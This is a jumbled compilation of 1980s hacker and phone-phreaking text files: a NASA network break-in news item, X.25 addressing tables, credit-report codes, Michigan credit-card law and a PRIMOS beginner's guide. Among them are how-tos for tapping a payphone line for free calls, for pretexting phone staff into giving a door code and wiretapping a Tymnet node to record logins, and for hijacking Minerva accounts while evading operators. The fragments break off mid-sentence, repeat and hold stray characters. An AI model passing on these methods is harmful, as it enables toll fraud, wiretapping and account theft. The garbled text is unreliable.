yesterday. An organization in Hamburg called the Chaos Computer Club, which claimed to be speaking for an anonymous group that broke into the network, said the illicit users managed to install a "Trojan horse," and gain entry into 135 computers on the European network. A "Trojan Horse" is a term for a permanent program that enables ameteur computer enthusiasts [as opposed to professionals?], or "hac t@Pkers," to use a password to bypass all the security procedures of a system and gain access to all the data in a target computer. [actually, this type of program is a 'back door' or a 'trap door.' The group may very well have *used* a trojan horse to enable them to create the back door, but it probably wasn't a trojan horse per se. A trojan horse is a program that does something illicit and unknown to the user in addition to its expected task. See Phrack xx-x, "Unix Trojan Horses,"  ޺for info on how to create a trojan horse which in turn creates a trap door into someone's account.] The NASA network that was broken into is called the Space Physics Analysis Network [ooh!] and is chiefly designed to provide authorized scientists and organizations with access to NASA data. The security system in the network was supplied by an American company, the Digital Equipment Corp. [Probably DECNET. Serves them right.] Users said the network is widely used by scient iists in the United States, Britain, West Germany, Japan and five other countries and does not carry classified information. A Chaos club spokesman, Wau Holland, denied that any data had been changed. This, he said, went against "hacker ethics." West German television reports said that computer piracy carries a penalty of three years in prison in West Germany. The government has not said what it plans to do. The Chaos club clearly views its break in as a majo m?.r coup. Holland, reached by telephone in Hamburg, said it was "the most successful running of a Trojan horse" to his knowledge, and the club sent a lengthy telex message to news organizations. It said the "Trojan horse" was spotted by a user in august, and the infiltrating group then decided to go public because "they feared that they had entered the dangerous field of industry espionage, economic crime, East-West conflict...and the legitimate security interests of high-tech jh institutions." The weekly magazine Stern carried an interview with several anonymous hobbyists who showed how they gained access to the network. One described his excitement when for the first time he saw on his screen, "Welcome to the NASA headquarters VAX installation." According to Chaos, the hobbyists discovered a gap in the Digital VAX systems 4.4 and 4.5 and used it to install their "Trojan Horse." [Excerpted and Typed by Shooting Shark. Comments by same.] jo"dSW-------------- I I P DCC R NTN SS I---------------I DNIC = data network identifier code (X.121) (5052 for austpac) DCC = data country code (X.121) NN = national number (X.121) R = network identifier (2 for austpac) SS = optional sub address (0,1 or 2 digits) NTN = terminal identifier (8 digits) P = international prefix (0 for austpac) In the long format the total number of digits i the called address field must be <= 15. "S[S .....cont next mesg. o Short form addressing : This is only used for national destinations R NTN SSSSSS I---------------I NN The constituent fields of the national number (NN) are the same for the long format except for the subaddress field: SSSSSS Optional subaddress (0-6 digits) The length limitaions of the field is <=15 (same for long) INTERNATIONAL PACKET SWITCHING NETWORKS which may be called from austpac. COUNNTRY NETWORK DNIC --------"67Jd----------------------------- Australia Austpac 5052 " Midas 5053 Austria Radio-Austria 2329 " Datex-P 2322 Belgium DCS 2062 Canada Teleglobe 3023 " Datapac 3020 " Infoswitch 3029 Finland Datapak 2442 COUNTRY NETWORK DNIC --------------------------------------- U.S.A. Trt 3119 " Uninet 3125 " ABv -The Disk Jockey liance/Furniture AP Airplane AU Automobile BT Boat CA Camper CL Credit Line CM Co-maker CO Consolidation EQ Equipment FH FHA Contract Loan FS Finance Statement HI Home Improvement IN Insurance LE Leases MB Mobile Home MC Miscellaneous MT Motor Home PI Property Improvement Plan PL Personal Loan RE Real Estate ST Student Loan SV Savings bond, stock, etc. US Unsecured VA Veteran Loan Date Codes ---------- A Automated, mos|e}and not too many cars going up and down the road. Then the next thing you have to do is find yourself a Fone Box. Once you have you Quite Area and you Fone Box then the phun begins. Section 2 Equipment.. 1 Phillips Head Screwdriver. 1 Pair Of Wire Strippers. 2 Allagator Clips 1 Roll Of Electrical Tape. 1 Hard Rod, of metal or anything else solid. 1 Reel of Extention Cord for your fone, that for if you wish to move away from the Fone Box when you wish to make you cal-rl 1 Telephone, one of those ones which is small and neat, a Handset Fone you could say is the best. Make sure it can do both Tone and Paulse. Once you have all your Equipment then the Phun Begins.. Section 3 Starting Off.. Open the door to the Telephone box and walk stright in. Once in the Box make sure is does ISD/OCT/IDD or what ever else you may wish to call Dialing International. If it does then your in luck, if it doesn't then you'll have to go off and find one that does. As we all know the Handset is on the Left hand side and the Dialing Ring is on the Right hand side. Now look at the RIGHT hand side of the Fone Box and you'll see a metal strip about 2 inches wide. This strip will go from the floor to the roof in the box and will be help into place by about 6 or 8 Phillip Head screws. Now take your Phillips Head screw driver and unscew the bottom 3 screws and remove them, but don't throw them away as we may want them later..  K Once you have the 3 Screws out pry it alittle on the side with the Screw Driver head untill you can get you Metal Rod in their, once you have done this keep opening it untill you see 2 Wires and a Thick peice of PVC pipe.. Section 4 Attaching.. Once you have made a big enuff gap with the Rod so you can get your fingers in, get your Wire Stripers and Strip the 2 Wires that you can see. They are the Fone Line wires and the PVC pipe contains the power to the light of the  i*?box. Off memory I think that the 2 wires should be Blue and White but I'm not sure, anyway it doesn't matter.. Once you have the 2 Wires stripped then take off the plug to your fone and get the 2 wires out fo your Plug.. Thier will be either 3 or 4 wires in your Plug but that doesn't matter as we only need to use 2 of them.. Which 2 wires I'll leave up to you, as with all these Non Telecom Standard Fones, the wire colors change ecah time you open one up. Well once you have the P!lug off your fone you will see the Wires and at the end their will be these little Metal thing'os, just slip the 2 Alagators clips, the open hole part of the clips not the prong parts over the metal thing'os. That way the current will run through the Clips from the Fone Box and up into your Hand Set. Once you have them attached the clips to the wire it's just a case of hit and miss to you find the right 2 wries in your plug, anyway that shouldn't take you too long. Once you do hav "ce the right wires then use the Electrial tape to attache the Clips to the Wires.. Section 5 Calling.. Once you have the Wires in your Plug attached it to the Clips you then attach the Clips to the Wire in the Fone Box, just keep trying and hold the Hand Set to your ear and when you get a Dial Tone you'll know you've hit the spot. Once you have you Dial Tone you may either just run the Cord up the side of the Box and stand in the box, so for anyone that walks past or drives  #vO past it will look as if your just makeing a call, and paying for it, but we know other wise. If you wish use the Extention Cord instead of takeing off the Plug on your Fone, and then once you have the Extention cord you will be able to move away from the Box and either sit in some Bushes or the first time we did it we all sat shouting into a Fone in a 69' Ford. Section 6 Finished.. Once you have finished just either remove you Alagotor Clips or just push them down into O the Metal Case again. Bend the case back in line with the box, and either Screw the Screws back in or just sit them in the box. This is just in case any little old Granny comes along the next day and wants to use the fone and see's Wires and Shit hanging out of the Case, she then calls Telecom and then you have to find another Box. This will work for a while unitll Telecom see's the Bill that the Fone Box you used and it will have an automatic ISD/STD bar on it and you'll only bew 6of phreaking that I had ever had. And well realy I must admit it was a very crude method at that. I know Phoneix and Nom debated and abused me when I called it phreaking and the declined to call our method phreaking at all. But then again we are all still looking to defraud the Telecommunication Company and getting our Free Calls all over the world. So it may be crude but put it this way, if it gets you what you want why knock it. First find a nice Quite Area with a lot of trees &. The name is Jim Jones, 2600 is his street address, street is the street name, Chicago is the city, IL is the state, 60604 is the zip. The Report: ---------- The report will come out, and will look rather odd, with all types of notation. An example of a Visa card would be: SUB NAME/ACCT# SUB# OPEND HICR DTRP/TERM BAL/MAX.DEL PAY.PAT MOP CITIBANK B453411 3/87 $1000 9/87A $0({V 12111 R01 4128XXXXXXXXX $1500 5/87 $120 Ok, Citibank is the issuing bank. B453411 is their subscriber code. 3/87 is when the account was opened. HICR is the most that has been spent on that card. 9/87 is when the report was last updated (usually monthly if active). $1000 is the credit line. $0 is the current balance. 12111 is the payment pattern, where 1=pays in 30 days and 2=pays in 60 days. R01 means that it is a "Revolving" account, meani)ing that he can make payments rather than pay the entire bill at once. 4128-etc is his account number (card number). $1500 is his credit line. 5/87 is when he was late on a payment last. $120 is the amount that he was late with. Here is a list of terms that will help you identify and understand the reports better: ECOA Inquiry and Account Designators ------------------------------------ I Individual account for sole use of applicant C Joint spousal countractual liability A Authori*>zed user of shared account P Participant in use of account that is neither C or A S Co-signer, not spouse M Maker primarily liable for account, co-signer involved T Relationship with account terminated U Undesignated N Non-Applicant spouse inquiry Remarks and FCBA Dispute Codes ------------------------------ AJP Adjustment pending BKL Bankruptcy loss CCA Consumer counseling account CLA Placed for collection CLO Closed to further purchases CTS Contact Subscriber DIS Dispute following +("5resolution DRP Dispute resolution pending FCL Foreclosure MOV Moved, left no forwarding address ND No Dispute PRL Profit and loss write-off RFN Account refinanced RLD Repossession, paid by dealer RLP Repossession, proceeds applied towards debt RPO Repossession RRE Repossession, redeemed RS Dispute resolved RVD Returned voluntarily, paid by dealer RVN Returned voluntarily RVP Returned voluntarily, proceeds go towards debt RVR Returned voluntarily, redeemed SET Settled for less than  ,Qfull balance STL Plate (Card) stolen or lost TRF Transferred to another office Type of Account --------------- O Open account (30 or 90 days) R Revolving or Option account (Open-end) I Installment (Fixed number of payments) M Mortgage C Check credit (line of credit at a bank) Usual Manner of Payment ----------------------- 00 Too new to rate; approved, but not used or not rated 01 Pays (or paid) within 30 days of billing, pays accounts as agreed 02 Pays in more than 30 days, but not  -1more than 60 days 03 Pays in more than 60 days, but not more than 90 days 04 Pays in more than 90 days, but not more than 120 days 05 Pays in 120 days or more 07 Makes payments under wage earner plan or similar arrangement 08 Repossession 8A Voluntary Repossession 8D Legal Repossession 8R Redeemed Repossession 09 Bad debt; placed for collection; suit; judgement; skip 9B Placed for collection UR Unrated UC Unclassified Kinds of Business Classification ------------------------------- A .VÓ Automotive B Banks C Clothing D Department and Variety F Finance G Groceries H Home furnishings I Insurance J Jewelry and Cameras K Contractors L Lumber, building materials M Medical and related health N National credit card O Oil and National credit card P Personal services other than medical Q Mail order houses R Real estate and public accommodations S Sporting Goods T Farm and Garden supplies U Utilities and Fuel V Government W Wholesale X Advertising Y Collection Services Z Misc /e ellaneous Type of Installment Loan ------------------------ AF Appliance/Furniture AP Airplane AU Automobile BT Boat CA Camper CL Credit Line CM Co-maker CO Consolidation EQ Equipment FH FHA Contract Loan FS Finance Statement HI Home Improvement IN Insurance LE Leases MB Mobile Home MC Miscellaneous MT Motor Home PI Property Improvement Plan PL Personal Loan RE Real Estate ST Student Loan SV Savings bond, stock, etc. US Unsecured VA Veteran Loan Date Codes ---------- A Automated, mos t current information available C Closed date F Repossessed/Written off M Further updates stopped P Paid R Reported Data S Date of last sale V Verified date Employment Verification Indicator --------------------------------- D Declined Verification I Indirect N No Record R Reported, but not verified S Slow Answering T Terminated V Verified X No Reply Hope this helps, anyone that has used Trans-Union will surely appreciate this, as the result codes are sometimes hard to decipher.  1a]jne of these days I'll find $500 lying on the street and I'll have nothing better to spend it on! Ha! Actually, I have a plan and thats another file..... I should point out one way of reading 1200 baud data. This should work in theory, however, I have not attempted it. Any fully Hayes compatible modem has a command that shuts off the carrier and allows you to monitor the phone line. The command is ATS10. You would then type either answer or originate depending on who you wa 25nted to monitor. It would be possible to write a program that records the first 300 or so characters then writes it to disk, thus allowing unattended operation. ************** HOW CRAZY I AM ************** PASSWORDS GALORE!!!! After numerous calls to several Bell offices, I found the one that handled tymnet's account. Heres a rough transcript: Op: Pacific Bell priority customer order dept. How may I help you? Me: Good Morning, this is Mr. Miller with Tymnet inc. We're interest 3Ced in adding some service to our x town location. Op: I'll be happy to help you Mr. Miller. Me: I need to know how many lines we have coming in on our rotary and if we have extra pairs on our trunk. We are considering adding ten additional lines on that rotary and maybe some FX service. Op: Ok....Whats the number this is referenced to? Me: xxx-xxx-xxxx (local node #) Op: Hold on a min....Ok bla, bla, bla. Well you get the idea. Anyway, after asking her a few more un4important questions I asked her for the address. No problem, she didn't even hesitate. Of course this could have been avoided if the CNA in my area would give out addresses, but they don't, just listings. Dressed in my best telco outfit, Pac*Bell base ball cap, tool belt and test set, I was out the door. There it was, just an office building, even had a computer store in it. After exploring the building for awhile, I found it. A large steel door with a push button lock. Back to 5(bthe phone. After finding the number where the service techs were I called it and talked to the tech manager. Mgr: Hello this is Joe Moron. Me: Hi this is Mr Miller (I like that name) with Pacific Bell. I'm down here at your x town node and we're having problems locating a gas leak in one of our Trunks. I believe our trunk terminates pressurization in your room. Mgr: I'm not sure... Me: Well could you have someone meet me down here or give me the entry code? Mg6 2r: Sure the code is 1234. Me: Thanks, I'll let you know if there's any trouble. So I ran home got my vcr (stereo) and picked up another TRC from trash shack. I connected the vcr to the first two incoming lines on the rotary. One went to each channel (left,right). Since the volume of calls is almost consistent, it wasn't necessary to stop the recorder between calls. I just let it run. I would come back the next day to change the tape. The vcr was placed under the floor in ca7,wωse a tech happened to come by for maintenance. These nodes are little computer rooms with air conditioners and raised floors. The modems and packet switching equipment are all rack mounted behind glass. Also, most of the nodes are unmanned. What did I get? Well alot of the logins were 1200, so I never found out what they were. Still have 'em on tape though! Also a large portion of traffic on both Tymnet and Telenet is those little credit card verification machines calling up Visa8d or Amex. The transaction takes about 30 secs and there are 100's on my tapes. The rest is as follows: Easylink Compuserve Quantumlink 3Mmail People link Homebanking USPS Chrysler parts order Yamaha Ford Dow Jones And a few other misc. systems of little interest. I'm sure if I was persistent I'd get something a little more interesting. I spent several months trying to fi9)gure out my 1200 baud problem. When I went back down there the code had been changed. Why? Well I didn't want to find out. I was out of there! I had told a couple of people who I later found could not be trusted. Oh well. Better safe than sorry. ************************************** Well, if you need to reach me,try my VMS at 415-338-7000 box 8130. But no telling how long that will last. And of course there's always P-80 systems at 304-744-2253. Probably be there forev?AHer. Thanks Scan Man, whoever you are. Also read my file on telco local loop wiring. It will help you understand how to find the line you are looking for. It should be called Telcowiring.Txt <<< AGENT STEAL >>> Chrysler parts order Yamaha Ford Dow Jones And a few other misc. systems of little interest. I'm sure if I was persistent I'd get something a little more interesting. I spent several months trying to fi%p A lesson in terms used - - (A 2af presentation) - ------------------------------------------------------------------------ This file is dedicated to all the phreaks/hacks that were busted in the summer of 1987, perhaps one of the most crippling summers ever for us. Preface: ------- Trans-Union is a credit service much like CBI, TRW or Chilton, but offers more competitive rates, and is being us <udge later said that the present sentence could not stand in this court so the case was referred to another court. Conclusion ---------- I hope that I have given you a better understanding about the law, that considers the illegal aspects of using credit cards. All this information was taken from The Michigan Compiled Laws Annotated Volume 754.157a-s and from The Michigan Appeals Report. In my next file I will talk about the laws concerning Check Fraud.  !MB -Tom Brokaw ense was stolen from a man, whose grocery store had been robbed. Dockery said that he had no knowledge of the robbery and previous charges on the card which totaled $1,373.21. He admitted that he did paste his picture on the drivers license. But again the court screws up, they receive evidence that the defendant had a record of felony's dating back to when he was sixteen and then assumed that he was guilty on the basis of his prior offenses. The j>Vy% hook, the recorder starts. It's that simple. **************** READING THE DATA **************** This is the tricky part. Different modems and different software respond differently but there are basics. The modem should be connected as usual to the telco line and computer. Now connect the speaker output of the tape player directly to the telephone line. Pick up the phone and dial the high side of a loop so your line doesn't make alot of noise and garble up your data. Now, ?7command your modem into the answer mode and press play. The tape should be lined up at the beginning of the recorded phone call. Naturally so you can see the login. Only one side of the transmission between the host and terminal can be monitored at a time. Going to the originate mode you will see what the host transmitted. This will include the echos of the terminal. Of course the password will be echoed as ####### for example, but going to the answer mode will display exactly w @:khat the terminal typed. You'll understand when you see it. A couple of problems you might run into will be hum and garbage characters on the screen. Try connecting the speaker output to the microphone of the hand set in your phone. Use a 1 to 1 coupling transformer between the tape player input and the TRC audio output. These problems are usually caused when using A.C. powered equipment. The common Ground of this equipment interferes with the telco ground which is D.C. Based.  03H I was a little reluctant to write this file because I have been unsuccessful in reading any of the 1200 baud data I have recorded. I have spoke with engineers and techs. Even one of the engineers who designs modems. All of them agree that it IS possible, but can't tell me why I am unable to do this. I believe that the problems is in my cheap ass modem. One tech told me I needed a modem with phase equalization circuitry which is found in most expensive 2400 baud modems. Well oBĽg * * * * FOR PHUN, MONEY AND PASSWORDS * * * * OR HOW TO GO TO JAIL FOR A LONG TIME. * * * ************************************************************************Cͷ****** WRITTEN BY AGENT STEAL 08/87 INCLUDED IN THIS FILE IS... * EQUIPMENT NEEDED * WHERE TO BUY IT * HOW TO CONNECT IT * HOW TO READ RECORDED DATA BUT WAIT THERES' MORE!! * HOW I FOUND A TYMNET NODE * HOW I GOT IN ************* THE EQUIPMENT ************* First thing you need is an audio tape recorder. What you will be recording whether it be voice or data will be in an analog audio format. From now on, most references will be towards daD.#ta recording. Most standard cassette recorders will work just fine. However, you are limited to 1 hour recording time per side. This can present a problem in some situations. A reel to reel can also be used. The limitations here are size and availability of A.C. Also, some reel to reels lack a remote jack that will be used to start and stop the recorder while the line is being used. This may not present a problem, more later. The two types of recorders I would advise staying aECS#way from (for data) are the micro cassette recorders and the standard cassette recorders that have been modified for 8 to 10 hour record time. The speed of these units is too unstable. The next item you need, oddly enough, is sold by Radio Shack under the name "Telephone recording control" part # 43-236 $24.95. See page 153 of the 1987 Radio Shack catalog. ***************** HOW TO CONNECT IT ***************** The Telephone recording control (TRC) has 3 wires coming out of it. #=}?1 Telco wire with modular jack. Cut this and replace with alligator clips. #2 Audio wire with miniature phone jack (not telephone). This plugs into the microphone level input jack of the tape recorder. #3 Audio wire with sub miniature phone jack. This plugs into the "REM" or remote control jack of the tape recorder. Now all you need to do is find the telephone line, connect the alligator clips, turn the recorder on, and come back later. Whenever the line goes off G Cd as, 1)"The person or Organization who requests a credit card and to whom or for whose benefit a credit card is subsequently issued" or 2)"The person or organization to whom a credit card was issued and who uses a credit card weather the issuance of the credit card was requested or not." In other words, if the company or individual is issued a card, once using it, they automatically agree to all the laws and conditions that bind it. Stealing, removing, retaining or concealment: -- HD------------------------------------------ Michigan Law states, that it is illegal to "steal, knowingly take or remove a credit card from a card holder." It also states that it is wrongful to "conceal a credit card without the consent of the card holder." Notice, that it doesn't say anything about carbon's or numbers acquired from BBS's, but I think that it could be considered part of the laws governing the access of a persons account without the knowledge of the cardholder, as Ic described above. Possession with Intent to Circulate or Sell ------------------------------------------- The law states that, it is illegal to possess or have under ones control, or receive a credit card and his intent is to circulate or sell the card. It is also illegal to deliver, circulate or sell a credit card, knowing that such a possession, control or receipt without the cardholders consent, shall be guilty of a FELONY. Notice again, they say nothing about possession of JFl carbons or numbers directly. It also does not clearly state what circulation or possession is, so we can only stipulate. All it says is that possession of a card (material plastic) is illegal. Fraud, forgery, material alteration; counterfeiting. ---------------------------------------------------- However, it might not be clearly illegal to possess a carbon or cc numbers. It IS illegal to defraud a credit card holder. Michigan law states, that any person who, with intent to Kq defraud, forge, materially alter or counterfeit a credit card, shall be guilty of a felony. Revoked or cancelled card, use with intent to defraud. ------------------------------------------------------ This state that "Any person who knowingly and with intent to defraud for the purpose of obtaining goods, property or services or anything of value on a credit card which has been revoked or cancelled or reported stolen by the issuer or issuee, has been notified of the cancellation LT by registered or certified mail or by another personal service shall be fined not more than $1,000 and not imprisoned not more than a year, or both. However, it does not clearly say if it is a felony or misdemeanor or civil infraction, my guess is that it would be dependant on the amount and means that you used and received when you defraud the company. Usually, if it is under $100 it is a misdemeanor but if it is over $100, it is a felony. I guess they figure that you should know M?rv these things. The People of The State of Michigan vs Anderson (possession) ----------------------------------------------- On April 4, 1980, H. Anderson attempted to purchase a pair of pants at Danny's Fashion Shops, in the Detroit area. He went up to the cashier to pay for the pants and the cashier asked him if he had permission to use the credit card. He said "No, I won it last night in a card game". The guy said that I could purchase $50 dollars worth of goods to pay  NYZback the debt. At the same time, he presumed the card to be a valid one and not stolen. Well, as it turned out it was stolen but he had no knowledge of this. Later, he went to court and pleased guilty of attempted possession of a credit card of another with intent or circulate or sell the same. At the guilty hearings, Mr. Anderson stated that the credit card that he attempted to use had been acquired by him in payment of a gambling debt and assumed that the person was the owner.  O"ݳThe trial court accepted his plea of guilty. At the sentencing, Mr. Anderson, denied that he had any criminal intent. Anderson appealed the decision stating that the court had erred by accepting his plea of guilty on the basis of insufficient factual data. Therefore, the trial court should not have convicted him of attempted possession and reversed the charges. The People of the State of Michigan vs Willie Dockery ----------------------------------------------------- On June  Pߠ23, 1977, Willie Dockery attempted to purchase gas at a Sears gas station by using a stolen credit card. The attendant noticed that his drivers license picture was pasted on and notified the police. Dockery stated that he had found the credit card and the license at an intersection, in the city of Flint. He admitted that he knowingly used the credit card atarivers license without the consent of the owner but he said that he only had purchased gasoline on the card. It turns out tha ;?t the credit card and drivers license was stolen from a man, whose grocery store had been robbed. Dockery said that he had no knowledge of the robbery and previous charges on the card which totaled $1,373.21. He admitted that he did paste his picture on the drivers license. But again the court screws up, they receive evidence that the defendant had a record of felony's dating back to when he was sixteen and then assumed that he was guilty on the basis of his prior offenses. The j Rld be required by anyone. Remember: Dial-ups require Type-B log-on procedure. Type-A is available on systems accessible through telenet. Canada Toronto 416-947-2992 (1200 Baud V.22 Modem Standard) U.S.A. Los Angeles 213-629-4025 (300/1200 Baud U.S.A. Modem Standard) Jersey City 201-798-8500 New York City 212-269-1274 212-809-1164 Service Addresses: The following is a VERY short list of just some of the 100's of service addre SlnIsses. In a later issue I will publish a complete list. Application Name: Type-A Type-B CITIADVICE 2240001600 CADV CITIBANKING ATHENS 2240004000 :30 CITIBANKING PARIS 2240003300 :33 CITIBANKING TOKYO 2240008100 :81 CITICASH MANAGER INTERNATIONAL 1 (NAFG CORP) 2240001200 CCM1 INTERNATIONAL 7 (DFI/WELLS FARGO) 2240013700 CCM7 COMPMARK ON-LINE 2240002000 CS4 ECONOMIC WEEK ON-LINE 2240011100 FAME1 INFOPOOL/INFOTEXT 2240003800 IP EXAPLE OF LTMNOGON PROCEDURE: THE FOLLOWING IS THE BUFFERED TEXT OF A LOG-ON TO CITIBANKING PARIS THROUGH TELENET. CONNECT 1200 TELENET 216 13.41 TERMINAL=VT100 @2240003300 223 90331E CONNECTED ENTER TYPE NUMBER OR RETURN TYPE B IS BEEHIVE DM20 TYPE 1 IS DEC VT100 TYPE A IS DEC VT100 ADV VIDEO TYPE 5 IS DEC VT52 TYPE C IS CIFER 2684 TYPE 3 IS LSI ADM 3A TYPE L IS LSI ADM 31 TYPE I IS IBM 3101 TYPE H IS HP 2621 TYPE P IS PERKIN ELMER 1200 TYPE K IS PRINTER KEYBOARD TYPE M IS MAI BASIC 4 TYPE T IS T8rELEVIDEO 9XX TYPE V IS VOLKER CRAIG 4404 TYPE S IS SORD MICRO WITH CBMP RELEASE BSC9.5 - 06JUN85 FOR 300 BAUD KEY ! AND CARRIAGE RETURN CONFIG. K1.1-I11H-R-C-B128 ENTER TYPE NUMBER OR RETURN K CONNECTED TO CITIBANK PARIS - CBP1 ,PORT 5 Have fun with this info, and remember, technology will rule in the end. ONAL 7 (DFI/WELLS FARGO) 2240013700 CCM7 COMPMARK ON-LINE 2240002000 CS4 ECONOMIC WEEK ON-LINE 2240011100 FAME1 INFOPOOL/INFOTEXT 2240003800 IP EXAPLE OF L VAn hacking an account is to attach to a "Ghost". A Ghost is an account with a user number greater than 0. (eg.ABC006). To do this, you simply type this at the ">". >a abc006. If Minerva lets you do this then type at the promt >passwd. This will let you change the password. There you have it, your own Minerva account (well not really yours). If you want to use Minerva, then you use your "Ghost" ONLY! Then if it goes dead on you, you then simply attach back to it again. Then original AB WǕC001 account will remain o.k. so long as you only use it to attach to other ghost's. This method has worked for me, after the same account went dead on me 10 times!!! Next little trick of mine, is getting an account which just went DEAD on you. If your on Minerva and it suddenly "kicks" you off, you have a chance to get it back again. As soon as a Minerva Oper suspects hacker using a particular he will quickly kick you off and change the password, thus stopping you from entering it X , again. On some occasions he will change the password to PORTA. He may also place a numeric sequence to it. (eg. if p/w was FRED, he would change it to F1R2E3D4.) Using these types of formats, he would know which accounts were tampered with. If he change the p/w to JACK, then he would have no idea which account was Hacked. Another little tricked used to keep your accounts live for long periods is to type LOG to logoff, NOT OFF as it states in the menu. Minerva has asked all of it's YV. members to use LOG. By doing that, they can see who the "Foriegn" users are.... Finally, I would like to explain to you, how Minerva op's recognise if a hacker is using a particular account. Think about it, if you are connected to RMI after business hours, then you seem a likely candidate to the title of hacker. If possible use your accounts during Business Hours Only. If you want to use a netlinking facility after those hours, then use Austpac, or Midas.. End  q㍝ The Warrior... cker must do as soon as he is successful in hacking an account iif p/w was FRED, he would change it to F1R2E3D4.) Using these types of formats, he would know which accounts were tampered with. If he change the p/w to JACK, then he would have no idea which account was Hacked. Another little tricked used to keep your accounts live for long periods is to type LOG to logoff, NOT OFF as it states in the menu. Minerva has asked all of it's [ | | | | Written exclusively for: | | Phrack Magazine | | | ---------------------------------------------------------------------------- (A Tom Brokaw/Disk Jockey Law File Production) Introduction: ------------  FB In this article, I will try to explain the laws concerning the illegal use of credit cards. Explained will be the Michigan legislative view on the misuse and definition of credit cards. Definition: ---------- Well, Michigan Law section 157, defines a credit card as, "Any instrument or device which is sold, issued or otherwise distributed by a business organization identified thereon for obtaining goods, property, services or anything of value." A Credit Card holder is define ]T+ code produced by the compiler L source program Listing C Command files $ Temporary work files (e.g. T$0000) # Seg files Commands For File Handling: ---------------------------- PRIMOS has several commands to control and access files and file contents. These commands can be used to list the contents of files and directories, and to copy, add, delete, edit, and print the contents of files. The capitalized letters of each are deleted. A LIST must be enclosed^p9 in parenthesis. Close arg ....Closes the file specified by 'arg'. 'Arg' could also be a list of PRIMOS file unit numbers, or the word 'ALL' which closes all open files and units. LIMITS ....Displays information about the login account, including information about resources allocated and used, grantor, and expiration date. Edit Access ....Edits the Access rights for the named directories and _j files. CName arg1 arg2 ....Changes the Name of 'arg1' to 'arg2'. The arguments can be files or directories. LD ....The List Directory command has several arguments that allow for controlled listing format and selection of entries. Attach arg ....allows you to Attach to the directory 'arg' with the access rights specified in the directory Access Control List. DOWN ....allows you to go 'DO` V>WN into' a sub-ufd (directory). You can specify which one of several sub-ufds to descend into with the optional 'arg'. UP ....allows you to go 'UP into' a higher ufd (directory). You can specify which one of several to climb into with the optional 'arg'. WHERE ....Displays what the current directory attach point is and your access rights. CREATE arg ....CREATES a new suaKb-directory as specified by 'arg'. COPY arg1 arg2 ....COPIES the file or directory specified by 'arg1' into a file by the same name specified by 'arg2'. Both 'arg1' and 'arg2' can be filename he SPOOL command, whose format is: SPOOL filename -AT destination where filename is the name of the file you want printed, and destination is the name of the printer where you want the file printed. For exampb$le if you want the file 'HACK.FTN' printed at the destination 'LIB' type: SPOOL HACK.FTN -AT LIB PRIMOS then gives you some information telling you that the file named was SPOOLed and the length of the file in PRIMOS records. To see the entries in the SPOOL queue, type: SPOOL -LIST PRIMOS then lists out all the files waiting to be printed on the printers on your login system. Also included in this information will be the filename of the files waiting to print, the locgin account name of the user who SPOOLed the file, the time that the file was SPOOLed, the size of the file in PRIMOS records, and the printer name where the file is to print. Changing The Password Of An Account: ------------------------------------ If you wish to change the password to your newly acquired account you must use the 'CPW' command (Change PassWord). To do this enter the current password on the command line followed by RETURN. PRIMOS will then prompt you for your desird=<0ed NEW password and then ask you to confirm your NEW password. To change your password of 'JOE' to 'SCHMOE' then type: OK, (system) CPW JOE (you) New Password? (system) You can save a copy of your terminal session by using the COMO (COMmand Output) command. When you type: COMO filename Everything which is typed or displayed on your terminal is saved (recorded) into the file name on the command line (filename). If a file by the same name exists, then that fileeaE will be REPLACED with NO WARNING GIVEN! When you have finished doing whatever it was you wanted a hardcopy of, you type: COMO -End which will stop recording your session and will close the COMO file. You can now print the COMO file using the SPOOL command as stated earlier. Conclusion: ----------- This concludes this first file on PRIMOS. Please remember this file is written primarily for beginners, and some of the text may have seemed BORING! However, this file was written in a vefnrbose fashion to FULLY INTRODUCE PRIMOS to beginners. Part II will deal with more the several languages on PRIMOS and some other commands. Author's Endnote: ----------------- I would like to thank the following people for the help in writing this file: AMADEUS (an oldie who is LONG GONE!) The University Of Kentucky State University Of New York (SUNY) Primenet And countless others..... Questions, threats, or suggestions to direct towards me, I can be found on any of the following: Th`ұe Freeworld ][.........301-668-7657 Digital Logic............305-395-6906 The Executive Inn........915-581-5146 OSUNY BBS................914-725-4060 -=*< Cosmos Kid >*=- ======================================== the COMO file using the SPOOL command as stated earlier. Conclusion: ----------- This concludes this first file on PRIMOS. Please remember this file is written primarily for beginners, and some of the text may have seemed BORING! However, this file was written in a veh[xe next file will be in circulation soon so be sure to check it out at any good BBS. Preface: -------- This file is written in a form to teach beginners as well as experienced Primos users about the system. It is written primarily for beginners however. PRIMOS, contrary to popular belief can be a very powerful system if used correctly. I have outlined some VERY BASIC commands and their use in this file along with some extra commands, not so BASIC. Logging On To A PRIMOS: -------------i4---------- A PRIMOS system is best recognized by its unusual prompts. These are: 'OK', and 'ER!'. Once connected, these are not the prompts you get. The System should identify itself with a login such as: Primenet V2.3 -or- Primecom Network The system then expects some input from you, preferably: LOGIN. You will then be asked to enter your user identification and password as a security measure. The login onto a PRIMOS is as follows: CONNECT Primenet V 2.3 (system) LOGIN (yj ou) User id? (system) AA1234 (you) Password? (system) KILLME (you) OK, (system) Preceding the OK, will be the systems opening message. Note that if you fail to type login once connected, most other commands are ignored and the system responds with: Please Login ER! Logging Off Of A PRIMOS: ------------------------ If at any time you get bored with primos, just type 'LOGOFF' to leave the system. Some systems have a TIMEOUT feature implemented mekaning that if you fail to type anything for the specified amount of time the system will automatically log you out, telling you something like: Maximum Inactive Time Limit Exceeded System Prompts: --------------- As stated previously, the prompts 'ER!' and 'OK,' are used on primos. The 'OK,' denotes that last command was executed properly and it is now waiting for your next command. The 'ER!' prompt denotes that you made an error in typing your last command. This prompt is usually prl^ Beceded by an error message. Special Characters: ------------------- Some terminals have certain characteristics that are built in to the terminal. key CONTROL-H Deletes the last character typed. Other Special Characters: ------------------------- RETURN: The return key signals PRIMOS that you have completed typing a command and that you are ready for PRIMOS to process the command. BREAK/CONTROL-P: Stops whatever is currently being processed in memory and will m" return PRIMOS to your control. To restart a process, type: START (abbreviated with S). CONTROL-S: Stops the scrolling of the output on your terminal for viewing. CONTROL-Q: Resumes the output scrolling on your terminal for inspection. SEMICOLON ';': The logical end of line character. The semicolon is used to enter more than one command on one line. Getting Help: ------------- You can get online information about the available PRIMOS commands by using nAthe 'HELP' command. The HELP system is keyword driven. That is, all information is stored under keywords that indicate the content of the help files. This is similar to VAX. Entering the single command 'HELP' will enter the HELP sub-system and will display an informative page of text. The next page displayed will provide you with a list of topics and their keywords. These topics include such items as PRIME, RAP, MAIL, and DOC. If you entered the MAIL keyword, you would be give oޱn information concerning the mail sub-system available to users on P simply enter PRIME to obtain 